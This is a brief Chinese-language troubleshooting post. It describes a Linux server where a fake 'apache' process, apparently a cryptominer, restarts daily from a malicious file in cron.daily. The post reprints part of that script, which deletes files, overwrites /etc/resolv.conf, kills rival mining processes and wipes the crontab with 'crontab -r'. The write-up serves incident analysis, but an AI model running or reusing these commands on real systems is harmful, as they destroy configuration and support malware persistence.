linux病毒分析

场景：系统每天早上自动执行一个apache的进程，且占用大量CPU资源如下图

检查分析进程所在路径：

然而tmp目录已经被删除了，kill -9 28271 28251 删除进程了，第二天又会自动启动这个进程，感觉应该是中毒了

解决办法：检查服务器自动执行脚本目录：

发现cron.daily目录最近被修改过，找到里面新增的文件anacron删除即可

部分anacron文件代码：

cd /tmp
rm -rf  apache* httpd.conf* /usr/local/bin/sysmonitord
echo 'nameserver 8.8.8.8'> /etc/resolv.conf
#/sbin/iptables -A OUTPUT -p tcp --dport 45560 -j ACCEPT
kill -9 `ps x|grep stratum|awk '{print $1}'`
kill -9 `ps x|grep httpd.conf|grep -v grep|awk '{print $1}'`
#killall -9 sysmonitord sh wget curl
crontab -r